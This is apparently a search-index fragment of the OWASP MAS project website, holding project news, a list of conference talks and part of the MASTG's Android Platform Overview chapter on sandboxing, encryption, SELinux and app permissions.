"},{"location":"news/#august-29th-2019-carlos-holguera-joins-the-leader-team","title":"August 29th, 2019: Carlos Holguera joins the leader team","text":"We are happy to announce that Carlos Holguera joins us as an official MSTG Author and co-leader! With a team of 3 we hope to march further as that would make our lives easier given that all of this hard work is done by volunteers!
"},{"location":"news/#august-4th-2019-oss-release","title":"August 4th, 2019: OSS Release!","text":"After a lot of work, we finally have a new release of the MSTG! Want to know more? Head over to the Github release page.
"},{"location":"news/#august-2nd-2019-project-promoted-to-flagship-status","title":"August 2nd, 2019: Project promoted to Flagship status!","text":"We have been awarded Flagship status! We are very grateful and excited about this! We could not have done this without our team of awesome volunteers that have committed to the project, wrote issues, and supported us in many other ways. A special thanks goes out to OWASP and especially Harold Blankenship for facilitating us to function as a project and for leading the project review at OWASP Appsec Tel-Aviv! Thank you!
"},{"location":"news/#june-5th-2019-new-release-of-the-masvs","title":"June 5th, 2019: New release of the MASVS","text":"As the summit is progressing, so are we! We have just released a new version of the MASVS (1.1.4). Want to know more? Head over to the Github release page!
"},{"location":"news/#may-21nd-2019-new-release-of-the-mstg","title":"May 21nd, 2019: New release of the MSTG","text":"As part of the preparations for the Open Security Summit, we have released a new version of the MSTG. Want to know more? Head over to the Github release page!
"},{"location":"news/#may-7th-2019-new-release-of-the-mstg","title":"May 7th, 2019: New release of the MSTG","text":"After many changes, we decided it was time to create a new release in order to improve the book version! Want to know more? Head over to the Github release page.
"},{"location":"news/#april-15th-2019-book-version-project-promotion-preparation-for-the-summit","title":"April 15th, 2019: Book version, project promotion & preparation for the summit","text":"Given that most news is already shared via OWASP Slack over the last quarter, we still see that it is good to share a summary of all of the good things outside of Slack using this news section. In this update we have a lot to share! While we started off this year with an improved version of the MASVS and MSTG, things have not been quiet: there has been a huge development in master of the MSTG and many issues have been raised and fixed. In the meantime, we have worked on an actual print of the book! While an early version is available through Hulu (no link supplied, google and buy at your own risk), we are working on making a better version of that book. In the mean time we have filed for a project promotion to Flagship! Next a lot more cool things happened: with the now official publication of NIST Special Publication (SP) 800-163 Revision 1, the MASVS and MSTG are getting more mainstream ;-). The MASVS & MSTG are mentioned in various other upcoming programs/standards/recommendations as well, which is really a recognition of the hard work put in by the community. We are proud to be part of such a great project! Next, we are preparing to join the Open Security Summit again! Already three people will be on site, and at least one remote, but we would love to work with more people at the project again! Want to know more? Please get in touch via Slack and join the #project-mobile-app-security channel or follow us on Twitter.
"},{"location":"news/#january-15th-2019-release-of-improved-checklist","title":"January 15th, 2019: Release of improved checklist","text":"We released a new version of the checklist! This version has adaptable references so that it can be used with newer versions of the MSTG as well. This version is currently available in French and English and we hope to add the Russian, Japanese, German and Spanish version soon! Want to know more? Take a look at our release page!. We would like to thank our volunteers for their effort to deliver these easy to use checklists!
"},{"location":"news/#january-3rd-2019-multilanguage-release-112-of-the-masvs","title":"January 3rd, 2019: Multilanguage Release 1.1.2 of the MASVS","text":"We released the 1.1.2 version of the OWASP MASVS! This is the first version in Chinese, English, French, German, Japanese, Russian, and Spanish! Exactly: we just added French, German, Japanese and Chinese! Obviously this would not be possible without all the volunteers that helped us with translations, feedback, updating, and automating the release process! We are grateful for the awesome team that pulled this off! Want to see the result? Take a look at our release page!
"},{"location":"news/#november-39th-2018-release-110-of-the-mstg","title":"November 39th, 2018: Release 1.1.0 of the MSTG","text":"We released the 1.1.0 version of the OWASP MSTG! Now all requirements of the MASVS have at least one covering testcase. We would like to thank all of our contributors for their hard work! Want to check it out? Check the releases!.
"},{"location":"news/#october-28th-2018-call-for-company-references","title":"October 28th, 2018: Call for Company references","text":"We are looking for company references that are using or have used the OWASP-MSTG and/or MASVS. If you have done so and are ok with being mentioned: please email to sven.schleier@owasp.org.
"},{"location":"news/#october-28th-2018-the-masvs-is-getting-more-translations","title":"October 28th, 2018: The MASVS is getting more translations","text":"Thanks to Romuald, Koki and many others, new translations of the MASVS are popping up. We now have a Japanese translation added and the French, German and Persian translations are in development. Each of them will be released the moment our release-automation of the MASVS is completed. Until then: feel free to checkout the sources!
"},{"location":"news/#october-18th-2018-the-mstg-is-now-officially-an-owasp-lab-project","title":"October 18th, 2018: The MSTG is now officially an OWASP Lab Project!","text":"During AppSec US 2018 in San Jose the Mobile Security Testing Guide was reviewed by several volunteers to assess the maturity of the project. As a result our request for project graduation to lab status was granted. The reviews can be found here.
Thanks to Harold Blankenship for organising the project review event during AppSec US and for pushing things forward for all the OWASP projects and of course to all people that took the effort to review our project!
"},{"location":"news/#october-13th-2018-mstg-102-released-twitter-account","title":"October 13th, 2018: MSTG 1.0.2 released & Twitter account!","text":"While working hard towards the 1.1.0 milestone of the MSTG, we released the 1.0.2 version. From now onward we have better PDF, Epub and Mobi files! We hope to port this to the MASVS after the Github release. We now have an official Twitter account: @OWASP_MAS!
"},{"location":"news/#september-21th-2018-masvs-automation-started","title":"September 21th, 2018: MASVS automation started","text":"Now that the document generation process for the MSTG has been optimized enough for milestone 1.1.0 (and we reached #1000 in Github of issues and Pull requests), we have started to improve the MASVS releasing mechanism. This will be further improved after Appsec USA and the release of 1.1.0 of the MSTG.
"},{"location":"news/#september-16th-2018-mstg-101-released","title":"September 16th, 2018: MSTG 1.0.1 released","text":"The Mobile Security Testing Guide version 1.0.1 has been released using our automated release system (based on tagging). See the Release Notes for all the changes. We now have added pdf support and improved our .docx quiet a lot. We will further improve the release process for the pdf and epubs after milestone 1.1.0.
"},{"location":"news/#september-1st-2018-mobile-security-testing-guide-mentioned-in-nist-sp-163r1","title":"September 1st, 2018: Mobile Security Testing Guide mentioned in NIST SP-163r1","text":"The Mobile Security Testing Guide is now reference in NIST SP 800-163 Revision 1.
"},{"location":"news/#augustus-2nd-2018-mobile-app-security-verification-standard-releases","title":"Augustus 2nd, 2018: Mobile App Security Verification Standard Releases","text":"A lot has happened & we are happy to announce that version 1.1 of the MASVS got released! Not just in English, but in Spanish and Russian as well. Want to know more? check the releases!. We would like to thank our Russian and Spanish speaking volunteers that have put quite some effort in translating the document! Lastly, we would like to announce that not all minor version releases will be in this news-section, unless something really important changed. Do you want to have the latest version of the MASVS? Just check Github!
"},{"location":"news/#june-16th-2018-jeroen-willemsen-joins-as-project-lead","title":"June 16th, 2018: Jeroen Willemsen joins as project lead","text":"Jeroen Willemsen has joined as a project leader for the OMTG project.
"},{"location":"news/#june-15th-2018-mobile-security-testing-guide-release-10","title":"June 15th, 2018: Mobile Security Testing Guide - Release 1.0","text":"The Mobile Security Testing Guide is now available for download in various formats. This is the first release of the MSTG and is a great community effort. We want to thank all contributors through this great journey. Thank you!
"},{"location":"news/#january-13th-2018-mobile-app-security-verification-standard-release-10","title":"January 13th, 2018: Mobile App Security Verification Standard Release 1.0","text":"Version 1.0 of the MASVS is now available for download. This release contains several bug fixes and modifications to security requirements and is our first release.
"},{"location":"news/#september-14th-2017-mobile-app-security-verification-standard-update","title":"September 14th, 2017: Mobile App Security Verification Standard Update","text":"Version 0.9.4 of the MASVS is now available for download. This release contains several bug fixes and modifications to security requirements.
"},{"location":"news/#july-5th-2017-sponsorship-packages-announced","title":"July 5th, 2017: Sponsorship Packages Announced","text":"We are happy to announce that a limited amount of sponsorship packages will be made available shortly through our crowdfunding campaign. With these packages, we offer companies opportunities to create brand awareness and maximize visibility in the mobile security space. 100% of the funds raised go directly into the project budget and will be used to fund production of the final release.
"},{"location":"news/#june-17th-2017-the-owasp-mobile-security-testing-guide-summit-preview","title":"June 17th, 2017: The OWASP Mobile Security Testing Guide - Summit Preview","text":"The MSTG Summit Preview is an experimental proof-of-concept book created on the OWASP Summit 2017 in London. The goal was to improve the authoring process and book deployment pipeline, as well as to demonstrate the viability of the project. Note that the content is not final and will likely change significantly in subsequent releases.
"},{"location":"news/#mobile-security-testing-workshop-on-the-owasp-summit-2017","title":"Mobile Security Testing Workshop on the OWASP Summit 2017","text":"The OWASP MSTG team is organizing a 5-days mobile security track on the OWASP Summit 2017. The track consists of a series of book sprints, each of which focuses on producing content for a specific section in the OWASP MSTG, as well as proof-reading and editing the existing content. The goal is to make as much progress on the guide as is humanly possible. Depending on the number of participants, we\u2019ll split into sub-groups to work on different subsections or topic areas.
"},{"location":"news/#how-to-join","title":"How to Join","text":"Join up for the working session(s) you like by following the link(s) on the mobile security track page, then hitting the \"Edit this page here\" link at the bottom, and adding yourself to the \"participants\" field. Signing up is not mandatory, but helps us to better organize the sessions. Don\u2019t worry though if your session of choice happens on the \"wrong\" day - you can always simply stop by and we\u2019ll brief you on your topic of choice. After all, this is the Woodstock of appsec!
Mobile security track main page:
http://owaspsummit.org/Working-Sessions/Mobile-Security/
Mobile security track schedule:
http://owaspsummit.org/schedule/tracks/Mobile-Security.html/
"},{"location":"news/#april-5th-2017-mobile-app-security-verification-standard-update","title":"April 5th, 2017: Mobile App Security Verification Standard Update","text":"Version 0.9.3 of the MASVS is now available for download. This release contains several bug fixes and modifications to security requirements:
* Merged requirements 7.8 and 7.9 into for simplification\n* Removed Anti-RE controls 8.1 and 8.2\n* Updated MSTG links to current master\n* Section \"Environmental Interaction\" renamed to \"Platform Interaction\"\n* Removed To-dos\n* Fixed some wording & spelling issues\n
"},{"location":"news/#january-31st-2017-mobile-app-security-verification-standard-v092-available-for-download","title":"January 31st, 2017: Mobile App Security Verification Standard v0.9.2 Available For Download","text":"The Mobile App Security Verification Standard (MASVS) has undergone a major revision, including a re-design of the security model and verification levels. We also revised many security requirements to address the multitude of issues raised on GitHub. The result is MASVS v0.9.2, which is now available for download in PDF format.
As the MASVS is nearing maturity, we have decided to freeze the requirements until the Mobile Testing Guide and checklists \"catch up\" (due to the one-to-one mapping between requirements in the MASVS and MSTG, changes to the requirements make it necessary to update the other documents as well, causing repeated effort). Unless major issues pop up, the current list will therefore remain in place until MASVS/MSTG v1.0, and further changes will be reserved for v1.1 or later releases.
The MASVS is a community effort to establish security requirements for designing, developing and testing secure mobile apps on iOS and Android. Join the OWASP Mobile Security Project Slack Channel to meet the project members! You can sign up for an account here.
"},{"location":"news/#january-28th-2017-mobile-crackmes-and-reversing-tutorials","title":"January 28th, 2017: Mobile Crackmes and Reversing Tutorials","text":"A key goal of the OWASP Mobile Testing Project is to build the ultimate learning resource and reference guide for mobile app reversers. As hands-on hacking is by far the best way to learn, we'd like to link most of the content to practical examples.
Starting now, we'll be adding crackmes for Android and iOS to the GitHub repo that will then be used as examples throughout the guide. The goal is to collect enough resources for demonstrating the most important tools and techniques in our guide, plus additional crackmes for practicing. For starters there are three challenges:
One of these three already has a documented solution in the guide. Tutorials for solving the other two still need to be added.
"},{"location":"news/#we-need-more-authors-and-contributors","title":"We Need More Authors and Contributors!","text":"Maybe you have noticed that the reverse engineering sections in the Mobile Testing Guide are incomplete. The reason: We're still in the starting stages and don't have a lot of authors and contributors (in fact, 99% of the reversing content was produced by one guy). We'd love to welcome you as a contributor of crackmes, tutorials, writeups, or simply new ideas for this project.
"},{"location":"news/#what-you-can-do","title":"What You Can Do","text":"The OWASP MSTG is an open project and there's a lot of flexibility - it mostly depends on your skill set and willingness to commit your time. That said, the some areas that need help are:
Help us figure out resiliency testing processes and obfuscation metrics The reversing part of the guide consists of the following chapters:
Tampering and Reverse Engineering - General Overview
Read the Contribution Guide first, and join the OWASP Mobile Security Project Slack Channel, where you'll find all the other project members.
"},{"location":"news/#january-22nd-2017-mobile-testing-guide-toc-available","title":"January 22nd, 2017: Mobile Testing Guide TOC Available","text":"As of now, we'll be auto-generating a table of contents out of the current MSTG master branch. This reflects the current state of the guide, and should make it easier to coordinate work between authors. A short-term goal is to finalize the structure of the guide so we get a clearer picture of what will be included in the final document. Lead authors are encouraged to complete the outline of their respective chapters.
On another note, we still need additional authors to help with all sections of the guide, including mobile operating system overviews, testing processes and techniques, and reverse engineering. Especially iOS authors are in short supply! As usual, ping us on the Slack Channel if you want to contribute.
"},{"location":"news/#december-4th-2016-call-for-authors-the-ultimate-open-source-mobile-app-reverse-engineering-guide","title":"December 4th, 2016: Call For Authors: The Ultimate Open-Source Mobile App Reverse Engineering Guide","text":"Reverse engineering is an art, and describing every available facet of it would fill a whole library. The sheer range techniques and possible specializations is mind-blowing: One can spend years working on a very specific, isolated sub-problem, such as automating malware analysis or developing novel de-obfuscation methods. For mobile app security testers, it can be challenging to filter through the vast amount of information and build a working methodology. Things become even more problematic when one is tasked to assess apps that are heavily obfuscated and have anti-tampering measures built in.
One of the main goals in the MSTG is to build the ultimate resource for mobile reverse engineers. This includes not only basic static and dynamic analysis, but also advanced de-obfuscation, scripting and automation. Obviously, writing all this content is a lot of work, both in terms of general content and OS-specific how-tos. We're therefore looking for talented authors that want to join the project early on. Topics include the following:
All of this is unpaid, volunteer work. However, depending on your contribution, you will be named in the \"lead authors\" or \"contributors\" list, and you'll be able to point to the fact that you co-authored the guide. You'll also be contributing to the field, helping others who are just starting out, and in turn becoming a happier person yourself (reaping the full benefits of your altruism).
"},{"location":"news/#where-do-i-sign-up","title":"Where do I sign up?","text":"First of all, have a look at the existing RE chapters outline. You'll probably immediately have ideas on how you can contribute. If that's the case, read the Contribution Guide first.
Then contact Bernhard Mueller - ideally directly on the OWASP Mobile Security Project Slack Channel, where you'll find all the other project members. You can sign up for an account here.
"},{"location":"talks/","title":"\ud83c\udf99 Talks","text":"Date Event Title Video Slides October 2023 OWASP AppSec US 2023 Refactoring Mobile App Security Soon Slides October 2023 OWASP AppSec US 2023 OWASP MAS Project Showcase Video Slides February 2023 Tech Talks by NowSecure OWASP MASVS v2 Updates Video Slides February 2023 OWASP AppSec EU 2023 Mobile Wanderlust\u201d! Our journey to Version 2.0! Video Slides November 2022 OWASP AppSec US 2022 Mobile Wanderlust\u201d! Our journey to Version 2.0! Soon Slides October 2022 NSConnect Inside the OWASP MASVS Refactor v2.0 Video Slides October 2022 Cybersec Chile Securing Mobile Apps with the OWASP MASVS and MASTG: Secure Storage and IPC N/A Slides September 2022 OWASP Global AppSec APAC Securing Mobile Apps with the OWASP MASVS and MASTG. Our journey to Version 2.0! Soon Slides July 2022 droidCon Berlin Securing Mobile Apps with the OWASP MASVS & MSTG Video Slides June 2022 OWASP Tunisia Securing Mobile Apps with the MASVS. Our Journey to v2.0 Video Slides June 2022 OWASP AppSec EU \u201cMobile Wanderlust\u201d! Our journey to Version 2.0! Video Slides February 2022 OWASP Toronto Insider's Guide to Mobile AppSec with OWASP MASVS Video N/A November 2021 NSConnect MASVS & MSTG Refactoring Video Slides September 2021 OWASP 20th Anniversary MASVS & MSTG Refactoring Video Slides September 2020 Ekoparty Security Conference (Spanish) OWASP Mobile Project and how to use it for white hat hacking Video Slides May 2020 OWASP Dutch Virtual chapter meetup MSTG Update Video N/A February 2020 OWASP New Zealand Day Building Secure Mobile Apps (you don\u2019t have to learn it the hard way!) N/A N/A January 2020 iOS Conf Singapore Building Secure iOS Apps (you don\u2019t have to learn it the hard way!) Video Slides October 2019 OWASP AppSec Day Melbourne Fixing Mobile AppSec Video N/A September 2019 OWASP Global AppSec Amsterdam Fast Forwarding mobile security with the OWASP Mobile Security Testing Guide N/A N/A September 2019 r2con in Barcelona radare2 and Frida in the OWASP Mobile Security Testing Guide Video Slides Summer 2019 Open Security summit 2019 Open Security summit 2019 N/A Slides April 2019 OWASP Kyiv OWASP MSTG in real life N/A N/A March 2019 AppDevcon (Amsterdam) Securing your mobile app with the OWASP Mobile Security Testing Guide N/A N/A November 2018 OWASP BeNeLux days 2018 Fast forwarding mobile security with the MSTG N/A Slides November 2018 OWASP Germany Day 2018 Introduction to Mobile Security Testing: Approaches and Examples using OWASP MSTG (in German) Video Slides October 2018 DBS AppSecCon (Singapore) Fixing Mobile AppSec N/A N/A October 2018 OWASP Bay Area Chapter Mobile Testing Workshop N/A N/A October 2018 OWASP AppSec USA Fixing Mobile AppSec N/A N/A October 2018 CSC 2018 A Perspective on Mobile Security in IoT and how OWASP can Help N/A Slides January 2018 OWASP North Sweden Umea Mobile Security Essentials N/A N/A January 2018 OWASP Gothenburg Mobile Security Essentials: All about the keying material Video N/A January 2018 OWASP Gotentburg Mobile Security Essentials: Introduction into OMTG Video N/A 2017 OWASP Day Indonesia 2017 Fixing Mobile AppSec N/A N/A 2017 OWASP Poland Day 2017 Testing Mobile Applications N/A Slides 2017 OWASP AppSec EU 2017 Fixing Mobile AppSec Video Slides"},{"location":"MASTG/","title":"OWASP MASTG","text":"GitHub Repo
Previously known as OWASP MSTG (Mobile Security Testing Guide)
The OWASP Mobile Application Security Testing Guide (MASTG) is a comprehensive manual for mobile app security testing and reverse engineering. It describes technical processes for verifying the controls listed in the OWASP MASVS.
Download the MASTG
Start exploring the MASTG:
Tests Techniques Tools Apps
Support the project by purchasing the OWASP MASTG on leanpub.com. All funds raised through sales of this book go directly into the project budget and will be used to for technical editing and designing the book and fund production of future releases.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/","title":"Android Platform Overview","text":"This chapter introduces the Android platform from an architecture point of view. The following five key areas are discussed:
Visit the official Android developer documentation website for more details about the Android platform.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-architecture","title":"Android Architecture","text":"Android is a Linux-based open source platform developed by the Open Handset Alliance (a consortium lead by Google), which serves as a mobile operating system (OS). Today the platform is the foundation for a wide variety of modern technology, such as mobile phones, tablets, wearable tech, TVs, and other smart devices. Typical Android builds ship with a range of pre-installed (\"stock\") apps and support installation of third-party apps through the Google Play store and other marketplaces.
Android's software stack is composed of several different layers. Each layer defines interfaces and offers specific services.
Kernel: At the lowest level, Android is based on a variation of the Linux Kernel containing some significant additions, including Low Memory Killer, wake locks, the Binder IPC driver, etc. For the purpose of the MASTG, we'll focus on the user-mode part of the OS, where Android significantly differs from a typical Linux distribution. The two most important components for us are the managed runtime used by applications (ART/Dalvik) and Bionic, Android\u2019s version of glibc, the GNU C library.
HAL: On top of the kernel, the Hardware Abstraction Layer (HAL) defines a standard interface for interacting with built-in hardware components. Several HAL implementations are packaged into shared library modules that the Android system calls when required. This is the basis for allowing applications to interact with the device's hardware. For example, it allows a stock phone application to use a device's microphone and speaker.
Runtime Environment: Android apps are written in Java and Kotlin and then compiled to Dalvik bytecode which can be then executed using a runtime that interprets the bytecode instructions and executes them on the target device. For Android, this is the Android Runtime (ART). This is similar to the JVM (Java Virtual Machine) for Java applications, or the Mono Runtime for .NET applications.
Dalvik bytecode is an optimized version of Java bytecode. It is created by first compiling the Java or Kotlin code to Java bytecode, using the javac and kotlinc compilers respectively, producing .class files. Finally, the Java bytecode is converted to Dalvik bytecode using the d8 tool. Dalvik bytecode is packed within APK and AAB files in the form of .dex files and is used by a managed runtime on Android to execute it on the device.
Before Android 5.0 (API level 21), Android executed bytecode on the Dalvik Virtual Machine (DVM), where it was translated into machine code at execution time, a process known as just-in-time (JIT) compilation. This enables the runtime to benefit from the speed of compiled code while maintaining the flexibility of code interpretation.
Since Android 5.0 (API level 21), Android executes bytecode on the Android Runtime (ART) which is the successor of the DVM. ART provides improved performance as well as context information in app native crash reports, by including both Java and native stack information. It uses the same Dalvik bytecode input to maintain backward compatibility. However, ART executes the Dalvik bytecode differently, using a hybrid combination of ahead-of-time (AOT), just-in-time (JIT) and profile-guided compilation.
Source: https://lief-project.github.io/doc/latest/tutorials/10_android_formats.html
Sandboxing: Android apps don't have direct access to hardware resources, and each app runs in its own virtual machine or sandbox. This enables the OS to have precise control over resources and memory access on the device. For instance, a crashing app doesn't affect other apps running on the same device. Android controls the maximum number of system resources allocated to apps, preventing any one app from monopolizing too many resources. At the same time, this sandbox design can be considered as one of the many principles in Android's global defense-in-depth strategy. A malicious third-party application, with low privileges, shouldn't be able to escape its own runtime and read the memory of a victim application on the same device. In the following section we take a closer look at the different defense layers in the Android operating system. Learn more in the section \"Software Isolation\".
You can find more detailed information in the Google Source article \"Android Runtime (ART)\", the book \"Android Internals\" by Jonathan Levin and the blog post \"Android 101\" by @_qaz_qaz.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-security-defense-in-depth-approach","title":"Android Security: Defense-in-Depth Approach","text":"The Android architecture implements different security layers that, together, enable a defense-in-depth approach. This means that the confidentiality, integrity or availability of sensitive user-data or applications doesn't hinge on one single security measure. This section brings an overview of the different layers of defense that the Android system provides. The security strategy can be roughly categorized into four distinct domains, each focusing on protecting against certain attack models.
Android supports device encryption from Android 2.3.4 (API level 10) and it has undergone some big changes since then. Google imposed that all devices running Android 6.0 (API level 23) or higher had to support storage encryption, although some low-end devices were exempt because it would significantly impact their performance.
Full-Disk Encryption (FDE): Android 5.0 (API level 21) and above support full-disk encryption. This encryption uses a single key protected by the user's device password to encrypt and decrypt the user data partition. This kind of encryption is now considered deprecated and file-based encryption should be used whenever possible. Full-disk encryption has drawbacks, such as not being able to receive calls or not having operative alarms after a reboot if the user does not enter the password to unlock.
File-Based Encryption (FBE): Android 7.0 (API level 24) supports file-based encryption. File-based encryption allows different files to be encrypted with different keys so they can be deciphered independently. Devices that support this type of encryption support Direct Boot as well. Direct Boot enables the device to have access to features such as alarms or accessibility services even if the user didn't unlock the device.
Note: you might hear of Adiantum, which is an encryption method designed for devices running Android 9 (API level 28) and higher whose CPUs lack AES instructions. Adiantum is only relevant for ROM developers or device vendors, Android does not provide an API for developers to use Adiantum from applications. As recommended by Google, Adiantum should not be used when shipping ARM-based devices with ARMv8 Cryptography Extensions or x86-based devices with AES-NI. AES is faster on those platforms.
Further information is available in the Android documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#trusted-execution-environment-tee","title":"Trusted Execution Environment (TEE)","text":"In order for the Android system to perform encryption it needs a way to securely generate, import and store cryptographic keys. We are essentially shifting the problem of keeping sensitive data secure towards keeping a cryptographic key secure. If the attacker can dump or guess the cryptographic key, the sensitive encrypted data can be retrieved.
Android offers a trusted execution environment in dedicated hardware to solve the problem of securely generating and protecting cryptographic keys. This means that a dedicated hardware component in the Android system is responsible for handling cryptographic key material. Three main modules are responsible for this:
Hardware-backed KeyStore: This module offers cryptographic services to the Android OS and third-party apps. It enables apps to perform cryptographic sensitive operations in an TEE without exposing the cryptographic key material.
StrongBox: In Android 9 (Pie), StrongBox was introduced, another approach to implement a hardware-backed KeyStore. While previous to Android 9 Pie, a hardware-backed KeyStore would be any TEE implementation that lies outside of the Android OS kernel. StrongBox is an actual complete separate hardware chip that is added to the device on which the KeyStore is implemented and is clearly defined in the Android documentation. You can check programmatically whether a key resides in StrongBox and if it does, you can be sure that it is protected by a hardware security module that has its own CPU, secure storage, and True Random Number Generator (TRNG). All the sensitive cryptographic operations happen on this chip, in the secure boundaries of StrongBox.
GateKeeper: The GateKeeper module enables device pattern and password authentication. The security sensitive operations during the authentication process happen inside the TEE that is available on the device. GateKeeper consists of three main components, (1) gatekeeperd
which is the service that exposes GateKeeper, (2) GateKeeper HAL, which is the hardware interface and (3) the TEE implementation which is the actual software that implements the GateKeeper functionality in the TEE.
We need to have a way to ensure that code that is being executed on Android devices comes from a trusted source and that its integrity is not compromised. In order to achieve this, Android introduced the concept of verified boot. The goal of verified boot is to establish a trust relationship between the hardware and the actual code that executes on this hardware. During the verified boot sequence, a full chain of trust is established starting from the hardware-protected Root-of-Trust (RoT) up until the final system that is running, passing through and verifying all the required boot phases. When the Android system is finally booted you can rest assured that the system is not tampered with. You have cryptographic proof that the code which is running is the one that is intended by the OEM and not one that has been maliciously or accidentally altered.
Further information is available in the Android documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#software-isolation","title":"Software Isolation","text":""},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-users-and-groups","title":"Android Users and Groups","text":"Even though the Android operating system is based on Linux, it doesn't implement user accounts in the same way other Unix-like systems do. In Android, the multi-user support of the Linux kernel is used to sandbox apps: with a few exceptions, each app runs as though under a separate Linux user, effectively isolated from other apps and the rest of the operating system.
The file system/core/include/private/android_filesystem_config.h includes a list of the predefined users and groups system processes are assigned to. UIDs (userIDs) for other applications are added as the latter are installed. For more details, check out the blog post \"An Overview Of Application Sandbox\" by Bin Chen on Android sandboxing.
For example, Android 9.0 (API level 28) defines the following system users:
#define AID_ROOT 0 /* traditional unix root user */\n #...\n #define AID_SYSTEM 1000 /* system server */\n #...\n #define AID_SHELL 2000 /* adb and debug shell user */\n #...\n #define AID_APP_START 10000 /* first app user */\n ...\n
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#selinux","title":"SELinux","text":"Security-Enhanced Linux (SELinux) uses a Mandatory Access Control (MAC) system to further lock down which processes should have access to which resources. Each resource is given a label in the form of user:role:type:mls_level
which defines which users are able to execute which types of actions on it. For example, one process may only be able to read a file, while another process may be able to edit or delete the file. This way, by working on a least-privilege principle, vulnerable processes are more difficult to exploit via privilege escalation or lateral movement.
Further information is available on the Android documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#permissions","title":"Permissions","text":"Android implements an extensive permissions system that is used as an access control mechanism. It ensures controlled access to sensitive user data and device resources. Android categorizes permissions into different types offering various protection levels.
Prior to Android 6.0 (API level 23), all permissions an app requested were granted at installation (Install-time permissions). From API level 23 onwards, the user must approve some permissions requests during runtime (Runtime permissions).
Further information is available in the Android documentation including several considerations and best practices.
To learn how to test app permissions refer to the Testing App Permissions section in the \"Android Platform APIs\" chapter.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#network-security","title":"Network security","text":""},{"location":"MASTG/Android/0x05a-Platform-Overview/#tls-by-default","title":"TLS by Default","text":"By default, since Android 9 (API level 28), all network activity is treated as being executed in a hostile environment. This means that the Android system will only allow apps to communicate over a network channel that is established using the Transport Layer Security (TLS) protocol. This protocol effectively encrypts all network traffic and creates a secure channel to a server. It may be the case that you would want to use clear traffic connections for legacy reasons. This can be achieved by adapting the res/xml/network_security_config.xml
file in the application.
Further information is available in the Android documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#dns-over-tls","title":"DNS over TLS","text":"System-wide DNS over TLS support has been introduced since Android 9 (API level 28). It allows you to perform queries to DNS servers using the TLS protocol. A secure channel is established with the DNS server through which the DNS query is sent. This assures that no sensitive data is exposed during a DNS lookup.
Further information is available on the Android Developers blog.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#anti-exploitation","title":"Anti-exploitation","text":""},{"location":"MASTG/Android/0x05a-Platform-Overview/#aslr-kaslr-pie-and-dep","title":"ASLR, KASLR, PIE and DEP","text":"Address Space Layout Randomization (ASLR), which has been part of Android since Android 4.1 (API level 15), is a standard protection against buffer-overflow attacks, which makes sure that both the application and the OS are loaded to random memory addresses making it difficult to get the correct address for a specific memory region or library. In Android 8.0 (API level 26), this protection was also implemented for the kernel (KASLR). ASLR protection is only possible if the application can be loaded at a random place in memory, which is indicated by the Position Independent Executable (PIE) flag of the application. Since Android 5.0 (API level 21), support for non-PIE enabled native libraries was dropped. Finally, Data Execution Prevention (DEP) prevents code execution on the stack and heap, which is also used to combat buffer-overflow exploits.
Further information is available on the Android Developers blog.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#seccomp-filter","title":"SECCOMP Filter","text":"Android applications can contain native code written in C or C++. These compiled binaries can communicate both with the Android Runtime through Java Native Interface (JNI) bindings, and with the OS through system calls. Some system calls are either not implemented, or are not supposed to be called by normal applications. As these system calls communicate directly with the kernel, they are a prime target for exploit developers. With Android 8 (API level 26), Android has introduced the support for Secure Computing (SECCOMP) filters for all Zygote based processes (i.e. user applications). These filters restrict the available syscalls to those exposed through bionic.
Further information is available on the Android Developers blog.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#android-application-structure","title":"Android Application Structure","text":""},{"location":"MASTG/Android/0x05a-Platform-Overview/#communication-with-the-operating-system","title":"Communication with the Operating System","text":"Android apps interact with system services via the Android Framework, an abstraction layer that offers high-level Java APIs. The majority of these services are invoked via normal Java method calls and are translated to IPC calls to system services that are running in the background. Examples of system services include:
The framework also offers common security functions, such as cryptography.
The API specifications change with every new Android release. Critical bug fixes and security patches are usually applied to earlier versions as well.
Noteworthy API versions:
Android development releases follow a unique structure. They are organized into families and given alphabetical codenames inspired by tasty treats. You can find them all here.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#the-app-sandbox","title":"The App Sandbox","text":"Apps are executed in the Android Application Sandbox, which separates the app data and code execution from other apps on the device. As mentioned before, this separation adds a first layer of defense.
Installation of a new app creates a new directory named after the app package, which results in the following path: /data/data/[package-name]
. This directory holds the app's data. Linux directory permissions are set such that the directory can be read from and written to only with the app's unique UID.
We can confirm this by looking at the file system permissions in the /data/data
folder. For example, we can see that Google Chrome and Calendar are assigned one directory each and run under different user accounts:
drwx------ 4 u0_a97 u0_a97 4096 2017-01-18 14:27 com.android.calendar\ndrwx------ 6 u0_a120 u0_a120 4096 2017-01-19 12:54 com.android.chrome\n
Developers who want their apps to share a common sandbox can sidestep sandboxing. When two apps are signed with the same certificate and explicitly share the same user ID (having the sharedUserId in their AndroidManifest.xml files), each can access the other's data directory. See the following example to achieve this in the NFC app:
<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\"\n package=\"com.android.nfc\"\n android:sharedUserId=\"android.uid.nfc\">\n
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#linux-user-management","title":"Linux User Management","text":"Android leverages Linux user management to isolate apps. This approach is different from user management usage in traditional Linux environments, where multiple apps are often run by the same user. Android creates a unique UID for each Android app and runs the app in a separate process. Consequently, each app can access its own resources only. This protection is enforced by the Linux kernel.
Generally, apps are assigned UIDs in the range of 10000 and 99999. Android apps receive a user name based on their UID. For example, the app with UID 10188 receives the user name u0_a188
. If the permissions an app requested are granted, the corresponding group ID is added to the app's process. For example, the user ID of the app below is 10188. It belongs to the group ID 3003 (inet). That group is related to android.permission.INTERNET permission. The output of the id
command is shown below.
$ id\nuid=10188(u0_a188) gid=10188(u0_a188) groups=10188(u0_a188),3003(inet),\n9997(everybody),50188(all_a188) context=u:r:untrusted_app:s0:c512,c768\n
